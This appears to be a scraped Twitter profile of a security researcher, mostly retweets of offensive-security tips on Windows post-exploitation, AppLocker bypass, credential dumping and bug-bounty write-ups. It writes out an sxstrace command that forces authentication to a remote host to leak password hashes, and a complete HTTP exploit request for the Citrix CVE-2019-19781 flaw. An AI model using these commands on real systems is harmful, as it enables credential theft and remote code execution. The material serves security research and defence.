Alexander Subbotin

@coreb1t

Security Researcher

Germany
Joined: January 2016

Tweets

  1. Pinned tweet
    30 Oct 2018

    Here are slides of my talk "Tales of Practical Android Penetration Testing" where I've presented Mobile-Pentest-Toolkit (MPT) Thanks everyone for attending, I hope you enjoyed it.

  2. Retweeted
    1 Feb

    Load encrypted PE from XML Attribute. MSBuild is still the best.😅 MSBuild sets Property then calls Execute. Use this example to decouple payloads & prove that all security products have a "Single File Bias". Decouple payloads to subvert detection.

  3. Retweeted
    24 Jan

    A new way to exfiltrate hash by forcing auth ? Check this : sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a   cc

  4. Retweeted
    24 Jan

    Post-exploitation tip: Do you know how to trivially & remotely hijack an session without prompt nor warning on user's side using signed binary (no patch/multi-session) ? qwinsta+mstsc shadowing is the answer ;) Details:

  5. Retweeted
    22 Jan

    Revisiting RDP lateral movement and releasing a project that will be part of a bigger tool coming next week

  6. Retweeted
    17 Jan

    If you have AppLocker deployed, be aware that most times when Windows 10 is updated/upgraded, it creates a TASKS_MIGRATED folder under C:\windows\system32 that has the CREATOR OWNER, meaning that users can create and execute files from the folder and bypassing AppLocker 😱

  7. Retweeted
    17 Jan

    Vulnerability severity levels

  8. Retweeted

    That epic Microsoft moment❤️ Recently worked on and ECC, so yes, 10 and 2016/2019 only. Previous versions like Windows 7 did not support personal EC curves (only few NIST standard ones)

  9. Retweeted
    14 Jan

    I'm excited to share my post about discovering & exploiting multiple critical vulnerabilities in Cisco's DCNM. Busting Cisco's Beans :: Hardcoding Your Way to Hell PoC exploit code:

  10. Retweeted
    13 Jan

    For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+({'BLOCK'='print+`id`'})%]

  11. Retweeted
    13 Jan
  13. Retweeted
    10 Jan
  14. Retweeted
    10 Jan

    Awesome research by looking at CVE-2019-19781 Citrix ADC RCE. Purposely not provided the fire and forget exploit (although this is well known now). Technical details provided for those looking at just how this issue manifests itself.

  15. Retweeted
    2 Jan

    lsassy 1.0.0 is finally out ! 🔸 Remotely dump **with built-in Windows tools only**, procdump is no longer necessary 🔸 Remotely parse lsass dumps to extract credentials 🔸 Link to to detect compromised users with path to Domain Admin

  16. Retweeted
    25 Dec 2019

    Recovering a SIM card's PIN via APDU sniffing on a cellular home phone station

  17. Retweeted
    24 Dec 2019

    Writeup on how I made $40,000 breaking the new Chromium Edge using essentially two XSS flaws.

  18. Retweeted
    21 Dec 2019

    New writeup, one of my favorite bugs 🤠 - Filling in the Blanks: Exploiting Null Byte Buffer Overflow for a $40,000 Bounty Featuring...

  19. Retweeted
    19 Dec 2019

    Bypass SSL Pinning and intercept HTTPS with Burp with apk-mitm - A CLI application that automatically prepares Android APK files for HTTPS inspection

  20. Retweeted
    18 Dec 2019
  21. Retweeted
    18 Oct 2019

    (1/2) This was a big week in the community: released a great post about BloodHound for Blue Teamers: reminded us how to best prevent BloodHound data collection:
